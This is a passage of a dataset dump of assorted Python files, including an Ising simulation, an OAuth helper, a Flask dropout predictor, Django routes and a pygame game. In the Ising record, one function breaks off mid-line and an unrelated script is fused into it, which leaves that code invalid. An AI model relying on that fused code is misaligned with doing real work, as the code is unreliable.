ax[0, i].set_yticks([])\r\n\r\n ax[1, i].imshow(Ys[i + 10], cmap='gray')\r\n ax[1, i].set_xticks([])\r\n ax[1, i].set_yticks([])\r\n\r\n plt.show()\r\n","sub_path":"Chapter12/denoising_dca.py","file_name":"denoising_dca.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"188087266","text":"# Utility routines for model calibration/utility scripts\n\nimport errno\nimport shutil\nfrom typing import Optional, Iterable, List, Sequence\nfrom itertools import chain\n\nimport errorutil as eu\n\n\n# Determines the file name that would be used as the backup by the backup()\n# function, without actually backing up the file.\ndef backup_name(fname, itnum):\n return suffix_name(fname, \"_\" + str(itnum) + \"_\")\n\n\n# Creates an iteration-tagged backup of the specified file.\n# The backup has the iteration number, bracketed by underscores,\n# between the base file name and the extension.\ndef backup(fname, itnum):\n shutil.copyfile(fname, backup_name(fname, itnum))\n\n\n# Inserts the specified suffix into the given filename immediately before\n# the dot and extension. For example, suffix_name(\"foo.txt\", \"bar\") returns\n# \"foobar.txt\".\ndef suffix_name(fname, suffix):\n bits = fname.split(\".\")\n if len(bits) == 1:\n return fname + suffix\n else:\n return \".\".join(bits[0:-1]) + suffix + \".\" + bits[-1]\n\n\n# Pluralizes a noun if n is not 1. The plural form is given by plur; if omitted,\n# the plural is the singular with \"s\" appended.\ndef pl(n, sing, plur=None):\n if n == 1:\n return sing\n elif plur is None:\n return sing + \"s\"\n else:\n return plur\n\n\n# \"Inclusive range\" - both start and stop are inclusive, which is more intuitive\n# for some applications.\ndef irange(start, stop):\n return list(range(start, stop + 1))\n\n\n# Returns the index of the specified column name in the specified list of column names.\n# The source parameter is the name of the source that is being read (e.g. a CSV filename)\n# so that helpful error messages can be produced on missing columns.\ndef colindex(source: str, available_cols: Sequence[str], col: str) -> int:\n try:\n return available_cols.index(col)\n except ValueError:\n raise eu.MissingColumn(col, available_cols, source)\n\n\n# Returns the index of the specified column names in the specified list of column names.\n# The source parameter is the name of the source that is being read (e.g. a CSV filename)\n# so that helpful error messages can be produced on missing columns.\ndef colindices(source: str, available_cols: Sequence[str], *cols: str) -> List[int]:\n return [colindex(source, available_cols, col) for col in cols]\n\n\n# Returns the indices of the specified values in the specified list.\n# Useful for finding column positions in a CSV file with headers.\n# Not optimized in any way, so only good for small lists.\ndef indices(alist, *values):\n return [alist.index(value) for value in values]\n\n\n# Returns the elements of the row indicated by the list of column indices.\n# This is designed so you can directly pass in the result of colindices.\ndef elements(row: Sequence[str], cols: Sequence[int]):\n return [row[i] for i in cols]\n\n\n# Converts a string to a bool the way you'd expect, rather than the stupid\n# way that the built-in bool() function does it.\ndef tobool(string):\n lower = string.lower()\n if lower == \"true\":\n return True\n elif lower == \"false\":\n return False\n else:\n raise ValueError(string)\n\n\n# Returns value forced to be between minvalue and maxvalue inclusive.\ndef clip(value, minvalue, maxvalue):\n if value < minvalue:\n value = minvalue\n if value > maxvalue:\n value = maxvalue\n return value\n\n\n# Returns a value from a nested dictionary indexed by the specified keys. Returns\n# the default value if a key is absent at any level.\ndef get_in(a_dict, keys, default):\n cursor = a_dict\n for key in keys:\n if key not in cursor:\n return default\n cursor = cursor[key]\n return cursor\n\n\n# Adds a mapping to a nested dictionary. The keys are used to index into each layer\n# of the dictionary. If a key at any level is absent, it is automatically created.\ndef assoc_in(a_dict, keys, value):\n cursor = a_dict\n for key in keys[:-1]:\n if key not in cursor:\n cursor[key] = {}\n cursor = cursor[key]\n cursor[keys[-1]] = value\n\n\n# Takes a nested dictionary and flips the order of the outermost two nests.\n# For example, if ndict[\"foo\"][\"bar\"] == \"spam\" in the original dictionary,\n# then flipkeys(ndict)[\"bar\"][\"foo\"] == \"spam\". The result is always a plain\n# Python dictionary, regardless of the class of the argument.\ndef flipkeys(ndict):\n result = {}\n for key1, indict in ndict.items():\n for key2, value in indict.items():\n inresult = result.setdefault(key2, {})\n inresult[key1] = value\n return result\n\n\n# Combination of zip and iteritems, used for stepping through several parallel\n# dictionaries that have the same keys. Returns an iterable of 2-tuples. The\n# first element is the key. The second is itself a tuple containing the value\n# corresponding to that key in each of the dictionaries. If the key sets are\n# not equal, only the keys that are present in all of the dictionaries are\n# returned. The first dictionary must allow iteration over its keys; the others\n# only need to support item access by key, so any object with a suitable\n# __getitem__ method is allowed.\ndef zipitems(*dicts):\n for key in dicts[0]:\n try:\n yield key, tuple([d[key] for d in dicts])\n except KeyError:\n pass\n\n\n# Reverses zip: turns a list of tuples into a tuple of lists\ndef unzip(a_list):\n return tuple(list(x) for x in zip(*a_list))\n\n\n# Opens a file for writing, as if by open(fname, \"w\"). If the file cannot be\n# opened (because it is locked or it is a directory, for example), then this\n# function will try appending \" (1)\" to the filename. If that also fails, then\n# it will try appending \" (2)\", and so on. Eventually, this function will\n# return a valid file object. This function will immediately raise an IOError\n# if the directory being written to does not exist.\n# Set binary=True to use binary mode (\"wb\") instead of text mode.\ndef smart_open(fname, binary=False):\n mode = \"wb\" if binary else \"w\"\n try:\n return open(fname, mode)\n except IOError as e:\n if e.errno != errno.EACCES:\n raise e\n i = 1\n while True:\n bracname = suffix_name(fname, \" (\" + str(i) + \")\")\n try:\n return open(bracname, mode)\n except IOError:\n if e.errno != errno.EACCES:\n raise e\n i += 1\n\n\n# Returns the best match to the specified value from among the specified options,\n# or None if there are no good matches.\n# The tolerance parameter indicates how closely the value has to match -\n# 0 means anything goes, 1 means exact matches only (up to case differences).\ndef best_match(value: str, options: Iterable[str], tolerance=0.6) -> Optional[str]:\n if value in options:\n return value\n else:\n import difflib\n def match(x):\n return difflib.SequenceMatcher(None, value, x).ratio()\n suggestion = max(options, key=match)\n if match(suggestion) > tolerance:\n return suggestion\n\n\n# An unmodifiable dictionary-like object that maps everything to itself.\n# It \"contains\" all possible elements.\n# Retrieving or iterating over the keys, values, or items is undefined,\n# since an IdDict \"contains\" infinitely many elements in an unspecified order.\n# If a dictionary is passed to the constructor, its mappings will be used\n# where possible, with all other keys still mapped to themselves.\nclass IdDict:\n # noinspection PyDefaultArgument\n def __init__(self, mappings={}):\n self.mappings = dict(mappings)\n\n def __getitem__(self, key):\n if key in self.mappings:\n return self.mappings[key]\n else:\n return key\n\n def __contains__(self, key):\n return True\n\n\n# Class that automatically interprets a comma-separated list of ranges, like 2-5,8,27-32\nclass RangeList:\n def __init__(self, arg):\n def parse_range(r):\n if len(r) == 0:\n return []\n parts = r.split(\"-\")\n if len(parts) > 2:\n raise ValueError(\"Invalid range: {}\".format(r))\n return range(int(parts[0]), int(parts[-1]) + 1)\n\n self.list = list(dict.fromkeys(chain.from_iterable(map(parse_range, arg.split(\",\")))))\n","sub_path":"PECAS/S28_aa/scriptutil.py","file_name":"scriptutil.py","file_ext":"py","file_size_in_byte":8281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"281387947","text":"#!/usr/bin/python3\nfrom peip3 import *\n\ndef get_from(options):\n i = 0\n while i < len(options):\n if options[i] == \"--from\":\n return options[i+1]\n i += 1\n return \"eng\"\n\ndef get_to(options):\n i = 0\n while i < len(options):\n if options[i] == \"--to\":\n return options[i+1]\n i += 1 \n \n return \"fr\" \n \n\ndef build_sentence(liste):\n out = \"\"\n i = 1\n while i < len(liste):\n if liste[i] != \"--from\" and liste[i] != \"--to\": \n out += argv[i]+\" \"\n i += 1\n else:\n i += 2\n\n return out \n\ndef url_builder(string):\n to = get_to(argv)\n ofrom = get_from(argv)\n out = regsub(\" \",\"%20\",string)\n out = \"http://translate.google.com/translate_t?text=\"+out+\"&langpair=\"+ofrom + \"|\" + to\n return out\n\ndef translate(url):\n page = urlopen(url)\n pattern = \"^.*;TRANSLATED_TEXT='([^']*)';.*$\"\n for line in page:\n if regsearch(\"TRANSLATED_TEXT\",line):\n return regsub(pattern,\"\\\\1\",line)\n\ndef main():\n out = translate(url_builder(build_sentence(argv)))\n print(out)\n\nmain()\n","sub_path":"TDInfoISNARDEnzo/td3/trad.py","file_name":"trad.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"239890193","text":"import random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef ena_nic():\n return random.choice([-1,1])\n\ndef delta_energija(matrika,xpos,ypos,ising):\n a=matrika[ypos][xpos]\n b=matrika[ypos][xpos+1]+matrika[ypos][xpos-1]+matrika[ypos+1][xpos]+matrika[ypos-1][xpos]\n # print((b*a)*ising)\n return -1*(b*a)*ising*(-1)\n\ndef magnetizacija(matrika):\n return sum(map(sum, matrika))/(len(matrika)**2)\n \ndef ising(n,J,temperatura):\n spini=[[ena_nic() for j in range(n+2)] for i in range(n+2)]\n \n sprememba=0\n\n \n while(sprememba<200*n**2):\n x=np.random.randint(1,n)\n y=np.random.randint(1,n)\n \n sprememba_energije=delta_energija(spini,x,y,J)\n \n if sprememba_energije<0:\n # print(spini[y][x])\n spini[y][x]=spini[y][x]*(-1)\n # print('nov',spini[y][x])\n else:\n ksi=np.random.rand()\n if ksi np.random.random():\n state = test_state\n ES = ET\n # else stay as is\n \n energy_values.append(ES)\n step_index_values.append(istep)\n m.append(M(mu, state))\n #row = ''\n #for site in state:\n # if site==1.0:\n # row += 'X'\n # else:\n # # fancy codes for red O's (thanks, J. Nielsen). You could also make a scatter plot with matplotlib.\n # row += '\\x1b[31mO\\x1b[0m'\n #print(row)\nplt.plot(step_index_values, energy_values)\nplt.xlabel('time step')\nplt.ylabel('energy')\nplt.title('%d spins: kT = %.1f' % (N, k*T))\nplt.savefig(\"spins.pdf\")\nprint(\"Theoretical M value:\")\nprint(theoretical_M(N,J, k, T, B))\nplt.figure()\nplt.plot(step_index_values, m)\nplt.title(\"Magnetization vs Time for kT = 1\")\nplt.xlabel(\"time_step\")\nplt.ylabel(\"$M = \\mu \\sum_i^N \\overline{s_i}$\")\nplt.savefig(\"m.pdf\")\n","sub_path":"problem_sets/ps4/locals/3/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"589025533","text":"# -*- coding: utf-8 -*-\n\n# 라이브러리 불러오기\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# matplotlib 한글 폰트 오류 문제 해결\nfrom matplotlib import font_manager, rc\nfont_path = \"./malgun.ttf\" #폰트파일의 위치\nfont_name = font_manager.FontProperties(fname=font_path).get_name()\nrc('font', family=font_name)\n\n# Excel 데이터를 데이터프레임 변환 \ndf = pd.read_excel('시도별 전출입 인구수.xlsx', fillna=0, header=0)\n\n# 전출지별에서 누락값(NaN)을 앞 데이터로 채움 (엑셀 양식 병합 부분)\ndf = df.fillna(method='ffill')\n\n# 서울에서 다른 지역으로 이동한 데이터만 추출하여 정리\nmask = (df['전출지별'] == '서울특별시') & (df['전입지별'] != '서울특별시') \ndf_seoul = df[mask]\ndf_seoul = df_seoul.drop(['전출지별'], axis=1)\ndf_seoul.rename({'전입지별':'전입지'}, axis=1, inplace=True)\ndf_seoul.set_index('전입지', inplace=True)\n\n# 서울에서 경기도로 이동한 인구 데이터 값만 선택\nsr_one = df_seoul.loc['경기도']\n\n# 스타일 서식 지정\nplt.style.use('ggplot') \n\n# 그래프 객체 생성 (figure에 1개의 서브 플롯을 생성)\nfig = plt.figure(figsize=(20, 5)) \nax = fig.add_subplot(1, 1, 1)\n\n# axe 객체에 plot 함수로 그래프 출력\nax.plot(sr_one, marker='o', markerfacecolor='orange', markersize=10, \n color='olive', linewidth=2, label='서울 -> 경기')\nax.legend(loc='best')\n\n#y축 범위 지정 (최소값, 최대값)\nax.set_ylim(50000, 800000)\n\n# 차트 제목 추가\nax.set_title('서울 -> 경기 인구 이동', size=20)\n\n# 축이름 추가\nax.set_xlabel('기간', size=12)\nax.set_ylabel('이동 인구수', size = 12)\n\n# 축 눈금 라벨 지정 및 75도 회전\nax.set_xticklabels(sr_one.index, rotation=75)\n\n# 축 눈금 라벨 크기\nax.tick_params(axis=\"x\", labelsize=10)\nax.tick_params(axis=\"y\", labelsize=10)\n\nplt.show() # 변경사항 저장하고 그래프 출력","sub_path":"part4/4.9_matplotlib_lines2.py","file_name":"4.9_matplotlib_lines2.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"120409889","text":"import json\nimport urllib, logging\nfrom urllib.request import urlopen\nfrom django.conf import settings\n\nfrom oauth.constants import BIND_USER_ACCESS_TOKEN_EXPIRES\nfrom oauth.OAuthQQAPIError import OAuthQQAPIError\nfrom itsdangerous import BadData, TimedJSONWebSignatureSerializer as TJWSerializer\n\nlogger = logging.getLogger(\"django\")\n\nclass OauthQQ(object):\n \"\"\"QQ辅助工具\"\"\"\n def __init__(self,client_id=None, client_secret=None, redirect_uri=None, state=None):\n \"\"\"\n :param client_id: QQ_CLIENT_ID\n :param client_secret: QQ_CLIENT_SECRET\n :param redirect_uri: QQ_REDIRECT_URI\n :param state: QQ_STATE\n \"\"\"\n self.client_id = client_id if client_id else settings.QQ_CLIENT_ID\n self.client_secret = client_secret if client_secret else settings.QQ_CLIENT_SECRET\n self.redirect_uri = redirect_uri if redirect_uri else settings.QQ_REDIRECT_URI\n self.state = state or settings.QQ_STATE\n # 第1步\n def get_login_url(self):\n '''获取Authorization_Code'''\n # url = \"https://graph.qq.com/oauth2.0/authorize?response_type={}&client_id={}\".format(????)\n url = \"https://graph.qq.com/oauth2.0/authorize?\"\n params = {\n \"response_type\": \"code\",\n \"client_id\": self.client_id,\n \"redirect_uri\": self.redirect_uri,\n \"state\":self.state\n\n }\n url += urllib.parse.urlencode(params)\n print('======',url)\n print(self.client_id)\n print(self.redirect_uri)\n print(self.state)\n return url\n\n # 第2步\n def get_access_token(self,code):\n '''通过Authorization_Code获取access_Token'''\n url = \"https://graph.qq.com/oauth2.0/token?\"\n params = {\n \"grant_type\": \"authorization_code\",\n \"client_id\": self.client_id,\n \"client_secret\": self.client_secret,\n \"code\": code,\n \"redirect_uri\": self.redirect_uri\n }\n url += urllib.parse.urlencode(params) #将query字典转换为url路径中的查询字符串\n try:\n resp = urlopen(url)\n '''\n urllib.request.urlopen(url, data=None)\n\n 发送http请求,如果data为None,发送GET请求,如果data不为None,发送POST请求\n\n 返回response响应对象,可以通过read()读取响应体数据,需要注意读取出的响应体数据为bytes类型\n '''\n\n\n resp_str = resp.read().decode()\n print(resp_str)\n\n resp_dict = urllib.parse.parse_qs(resp_str)#将qs查询字符串格式数据转换为python的字典\n\n print(resp_dict)\n print(self.client_id)\n print(self.redirect_uri)\n print(self.state)\n except Exception as e:\n logger.error(\"获取access_token异常 %s\" % e)\n raise OAuthQQAPIError\n else:\n access_token = resp_dict.get(\"access_token\")\n print(access_token)\n\n return access_token[0]\n\n # 第3步\n def get_openid(self,accesss_token):\n '''通过获取access_token获取openid'''\n url = \"https://graph.qq.com/oauth2.0/me?access_token=\" + accesss_token\n try:\n resp_str = urlopen(url).read().decode()\n print(resp_str) # callback( {\"client_id\":\"YOUR_APPID\",\"openid\":\"YOUR_OPENID\"} );\n resp_str = resp_str[10:-4]\n print(resp_str)\n resp_dict = json.loads(resp_str)\n print(resp_dict)\n\n except Exception as e:\n logger.error(\"获取openid异常 %s\" % e)\n raise OAuthQQAPIError\n else:\n openid = resp_dict.get(\"openid\")\n print(openid)\n\n return openid\n\n # 加密openid\n def generate_bing_user_accesss_token(self,openid):\n s = TJWSerializer(settings.SECRET_KEY, BIND_USER_ACCESS_TOKEN_EXPIRES)\n token = s.dumps({\"openid\":openid})\n print(token)\n token = token.decode()\n return token\n #解密openid\n @staticmethod\n def check_bing_user_accesss_token(access_token):\n s = TJWSerializer(settings.SECRET_KEY, BIND_USER_ACCESS_TOKEN_EXPIRES)\n try:\n data = s.loads(access_token)\n print(data)\n except BadData:\n logging.error(' {} 解码超时'.format(access_token))\n return None\n return data[\"openid\"]\n\n\n\n\n\n\n","sub_path":"yxm/yxm/apps/oauth/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"478623309","text":"def replaceDig(x, from1, to):\n result = 0\n multiply = 1\n\n while (x > 0):\n reminder = x % 10\n if (reminder == from1):\n result = result + to * multiply\n\n else:\n result = result + reminder * multiply\n\n multiply *= 10\n x = int(x / 10)\n return result\n\ndef calculateMinMaxSum(x1, x2):\n minSum = replaceDig(x1, 6, 5) + replaceDig(x2, 6, 5)\n maxSum = replaceDig(x1, 5, 6) + replaceDig(x2, 5, 6)\n print(\"Minimum sum =\", minSum)\n print(\"Maximum sum =\", maxSum, end=\" \")\n# Driver code\nif __name__ == '__main__':\n x1 = 45\n x2 = 64\n calculateMinMaxSum(x1, x2)\n x3 = 11\n x4 = 53\n calculateMinMaxSum(x3, x4)\n","sub_path":"MinMaxSum.py","file_name":"MinMaxSum.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"167491780","text":"from flask import Flask,render_template,request,url_for\nfrom scipy import stats\n#EDA Packages\nfrom sklearn import preprocessing \nlabel_encoder = preprocessing.LabelEncoder() \nimport pandas as pd\nimport numpy as np\nimport pickle\napp = Flask(__name__)\ncols = ['gender', 'caste', 'mathematics_marks','english_marks', 'science_marks', 'science_teacher','languages_teacher','guardian', 'internet']\nwith open('model1.pkl', 'rb') as file: \n model1 = pickle.load(file)\nwith open('model3.pkl', 'rb') as file: \n model3 = pickle.load(file)\nwith open('model4.pkl', 'rb') as file: \n model4 = pickle.load(file)\nwith open('model5.pkl', 'rb') as file: \n model5 = pickle.load(file)\ndef transf(dat):\n atr=[]\n for x in dat['continue_drop']:\n if x==\"continue\":\n atr.append(0)\n else:\n atr.append(1)\n dat['continue_drop']=atr\n dat['guardian']= label_encoder.fit_transform(dat['guardian'])\n dat['gender']= label_encoder.fit_transform(dat['gender'])\n dat['internet']= label_encoder.fit_transform(dat['internet'])\n dat['caste']= label_encoder.fit_transform(dat['caste'])\n return dat\ndef mode (A,B,C,D):\n tzero = 0\n tone=0\n n= len(A)\n results=[]\n for i in range(0,n):\n one = 0\n zero = 0\n if(A[i]==0):\n zero = zero+1\n if(A[i]==1):\n one = one +1\n if(B[i]==0):\n zero = zero+1\n if(C[i]==0):\n zero = zero+1\n if(B[i]==1):\n one = one +1\n if(C[i]==1):\n one = one +1\n if(D[i]==0):\n zero = zero+1\n if(D[i]==1):\n one = one +1\n if(zero>one):\n results.append(0)\n tzero=tzero+1\n if(one>zero):\n results.append(1)\n tone=tone+1\n if(one == zero):\n if(tzero>tone):\n results.append(0)\n tzero=tzero+1\n else:\n results.append(1)\n tone=tone+1\n return results\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n@app.route(\"/predict\",methods=['POST'])\ndef predict():\n\n if request.method == 'POST':\n int_features = [float(x) for x in request.form.values()]\n final = np.array(int_features)\n data_unseen = pd.DataFrame([final], columns = cols)\n data_unseen['mathematics_marks'] = data_unseen['mathematics_marks']/100\n data_unseen['english_marks'] = data_unseen['english_marks']/100\n data_unseen['science_marks'] = data_unseen['science_marks']/100\n prediction = model1.predict(data_unseen)\n prediction1 = int(prediction[0])\n prediction = model3.predict(data_unseen)\n prediction3 = int(prediction[0])\n prediction = model4.predict(data_unseen)\n prediction4 = int(prediction[0])\n prediction = model5.predict(data_unseen)\n prediction5 = int(prediction[0])\n pred = stats.mode([prediction1,prediction3,prediction4,prediction5])[0][0]\n if pred==0:\n prediction = \"NOT DROP\"\n else:\n prediction = \"DROP\"\n return render_template('index.html',pred='STUDENT WILL {}'.format(prediction))\ndef guess (dataset):\n ids=[]\n A = model1.predict(dataset)\n B = model5.predict(dataset)\n C =model3.predict(dataset)\n D = model4.predict(dataset)\n results = mode(A,B,C,D)\n index = find(results)\n return index\ndef find(A):\n resul = []\n n = len(A)\n for i in range (0,n):\n if A[i]==1:\n resul.append(i)\n return resul\n@app.route(\"/data\",methods=['POST'])\ndef data():\n\tif request.method == 'POST':\n\t\tf = request.form['csvfile']\n\t\twith open(f) as file:\n\t\t\tcsvfile = pd.read_csv(file)\n\t\tdf = transf(csvfile)\n\t\tX = df[['gender', 'caste', 'mathematics_marks','english_marks', 'science_marks', 'science_teacher','languages_teacher', 'guardian','internet']]\n\t\tadc=guess(X)\n\t\tids =[]\n\t\tfor i in adc:\n\t\t\tids.append(df['student_id'][i])\n\t\tids=pd.DataFrame(ids)\n\t\tids=ids.rename(columns={0: \"Student_ID\"})\n#\t\tout = model1.predict(csvfile)\n\t\treturn render_template('data.html',data =ids.to_html())\nif __name__ == '__main__':\n\tapp.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"241312397","text":"\"\"\"\nProject : Olin College Software Design Spring 2017\nBy : Seungin Lyu and Yichen Jiang\nGame Name : Pixel_Dancer\nVersion : 0.2\nDate : April 8th, 2017\n\nMove your doggy around with the arrow keys to paint as many\npictures as possible. Remember, you should follow the music rhythm! If you\naren't following the beat, you will lose your precious energy and end up\nonly coloring half the grid you are on. Also, you don't want to go out of the\npicture and be careful not to eat the toxic chocolates! You will gain some\nextra energy everytime you complete one picture. Good Luck!\n(by the way..the energy decreases naturally because doggy is hungry..)\nYou can play with the game settings by manipulating the defined constants.\n\n\"\"\"\n\nimport pygame\n\nimport game as g\nimport models as m\nimport viewers as v\nimport controllers\nimport config\n\n\ndef main():\n \"\"\"\n This main function contains all the while loops of the game.\n \"\"\"\n # initialize pygame\n pygame.init()\n # Game Settings\n c = config.config()\n pygame.display.set_caption(c.TITLE)\n\n # initialize game instance with impofrted config.py\n\n while (True):\n # initializing models in game instance speficied by config.py\n game = g.game(c)\n game.new_game()\n # initialize game screen\n screen = pygame.display.set_mode(game.canvas_size)\n # initializes viewers :\n viewers = [v.BackgroundViewer(game.bg),\n v.GridListViewer(game.grid_list),\n v.MonsterViewer(game.monster, game.grid_list),\n v.PlayerViewer(game.player, game.grid_list),\n v.EnergyViewer(game.player),\n v.RhythmViewer(game.rhythm)]\n # intializes controller\n controller = controllers.PlayerController(game.player)\n game.start_game()\n while game.running:\n if game.player.has_died:\n game.game_over()\n if game.is_stage_complete():\n game.set_new_stage()\n\n # checks external inputs / runs controllers\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYDOWN:\n controller.PlayerKeyController(event,\n game.grid_list,\n game.rhythm)\n # updates models every frame (regardless of keyboard input)\n game.monster.update(game.rhythm)\n game.player.update(game.rhythm, game.monster)\n game.rhythm.update_frame_count(1)\n\n # drawing on screen\n [viewer.draw(screen) for viewer in viewers]\n\n game.clock.tick(c.FPS)\n pygame.display.flip()\n\n # a new screen for gameover screen\n screen = pygame.display.set_mode(game.canvas_size)\n while(game.gameover):\n # initializing models\n font = \"norasi\"\n msg1 = m.Message(font, 80, \"GAME OVER\", (90, 80), c.RED)\n msg2 = m.Message(font, 30, \"PRESS ENTER TO PLAY AGAIN\",\n (90, 480), c.BLUE)\n msg3 = m.Message(font, 50,\n \"Pictures Cleared : \" + str(game.total_num_pic),\n (90, 280), c.WHITE)\n messages = [msg1, msg2, msg3]\n\n viewers = []\n # initializing viewers\n [viewers.append(v.MessageViewer(msg)) for msg in messages]\n\n # drawing on screen\n [viewer.draw(screen) for viewer in viewers]\n\n # check external inputs\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n game.new_game()\n\n game.clock.tick(c.FPS)\n pygame.display.flip()\n pygame.quit()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"148723858","text":"class Test:\r\n \"This is a sample class\"\r\n name=\"Hello\"\r\n def fun(self):\r\n print(\"Hello\")\r\n @classmethod\r\n def fun2(cls):\r\n print(Test.name)\r\n def fun1(self):\r\n print(\"This is second function\")\r\n\r\nif __name__==\"__main__\":\r\n t=Test()\r\n t.fun()\r\n print(Test.__dict__)\r\n print(Test.__doc__)\r\n Test.fun2()\r\n Test.fun(t)\r\n Test.fun1(t)","sub_path":"classmethd.py","file_name":"classmethd.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"353514437","text":"import numpy as np\n\n\nclass KernalSmooth:\n \n \n def kernal_function(self, x, kernal):\n if kernal == \"gaussian\":\n return 1/(np.sqrt(2*np.pi)) * np.exp(-(np.array(x)**2)/2)\n elif kernal == \"uniform\":\n return 0.5 * (np.abs(x) <= 1)\n elif kernal == \"epanechnikov\":\n return 0.75 * (1-x**2) * (np.abs(x) <= 1)\n elif kernal == \"biquadrate\":\n return (15/16) * (1-x**2)**2 * (np.abs(x) <= 1)\n else :\n print(\"your kernal function is not avaliable\")\n \n \n def fitpredict(self, U, y, x, h, kernal = \"gaussian\"):\n y_hat = []\n for each_x in x:\n w = self.kernal_function((U - each_x)/h, kernal)/h\n w = w / w.sum()\n\n # 如果之预测一个变量\n if len(np.shape(y)) == 1:\n y_hat += [(w * y).sum()]\n\n # 如果需要预测多个变量\n elif len(np.shape(y)) == 2:\n multi_w = w\n for i in range( np.shape(y)[1]-1 ):\n multi_w = np.vstack((multi_w,w))\n multi_w = multi_w.T\n y_hat.append((multi_w * y).sum(axis=0))\n\n return np.array(y_hat)","sub_path":"pycode/nonparam.py","file_name":"nonparam.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"648277772","text":"from django.conf import settings\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.template.context_processors import static\nfrom django.urls import path, include, re_path\nfrom app01 import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('test/',views.responseTest),\n path('getPaperListByKey',views.getPaperListByKey),\n path('login',views.login),\n path('register',views.register),\n path('getPaperListByKeyword',views.getPaperListByKeyword),\n path('getPaperInfoByID',views.getPaperInfoByID),\n path('judgeRepetitiveUserName',views.judgeRepetitiveUserName),\n path('judgeRepetitiveEmail',views.judgeRepetitiveEmail),\n path('check_mail',views.check_mail),\n path('getPaperListByAid',views.getPaperListByAid),\n path('complexSearch',views.complexSearch),\n path('follow_author/', views.followAuthor),\n path('show_followed/', views.followed),\n path('cancel_follow/', views.cancel_follow),\n path('collect_paper/', views.collect_paper),\n path('verify_author/', views.veri_author),\n path('verify_success/', views.verify_success),\n path('check_user_info/', views.check_user_info),\n path('edit_user_info/', views.edit_user_info),\n path('hot_author/', views.hot_author),\n path('hot_paper/', views.hot_paper),\n path('hot_field/', views.hot_field),\n path('show_collected/', views.collected),\n path('cancel_collect/', views.cancel_collect),\n path('getAuthorInfoById',views.getAuthorInfoById),\n path('getPaperOfField',views.getPaperOfField),\n path('getAuthorOfField', views.getAuthorOfField),\n path('Authentication',views.Authentication),\n path('getBrowerHistory',views.getBrowerHistory),\n path('check_user', views.check_user),\n path('hot_orgz/',views.hot_orgz),\n path('hot_studyz/',views.hot_studyz),\n path('hot_authorz/',views.hot_authorz),\n path('hot_paperz/',views.hot_paperz),\n path('paper_recommend',views.paper_recommend),\n path('deleteAllBrowerHistory',views.deleteAllBrowerHistory),\n path('related_paper',views.related_paper),\n path('refer_string/',views.refer_string),\n path('guozong/',views.guozong),\n path('topic_orgs/',views.topic_orgs)\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","sub_path":"app01/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"428859156","text":"# -*- coding: utf-8 -*-\n\n\ndef es_solucion(a, b, p):\n\n pcalc = a + b + (a**2 + b**2)**0.5\n\n if (pcalc == p):\n return True\n\n return False\n\n\ndef result():\n maxp = 0\n total = 0\n max_total = 0\n\n N = 1000\n\n # for p in range(1, N-(N//2)):\n for p in range(1, N):\n\n total = 0\n\n for a in range(1, 1001):\n\n for b in range(a+1, 1001):\n\n if a + b > p:\n break\n\n if es_solucion(a, b, p):\n # print(a, b, p)\n total = total + 1\n\n if (max_total < total):\n maxp = p\n max_total = total\n # print(\"total\", maxp, max_total, p, a, b)\n return maxp\n","sub_path":"projecteuler/problems/d0025/p0039/r0039.py","file_name":"r0039.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"605250612","text":"#1.生成器可以产出值,也可以接收值(调用方传进来的值)\ndef gen_func():\n html = yield \"http://projectsedu.com\"\n print(html)\n yield 2\n yield 3\n return \"bobby\"\n\nif __name__ == \"__main__\":\n gen = gen_func()\n #启动生成器的方式有两种:next(),send()\n url = next(gen)\n # 在调用send发送非None值之前,我们必须启动一次生成器,两种方式1.gen.send(None) 2.next(gen)\n # url = gen.send(None)\n # download url\n html = \"bobby\"\n #send方法可以传递值到生成器内部,同时还可以重启生成器执行到下一个yield位置\n gen.send(html)\n # 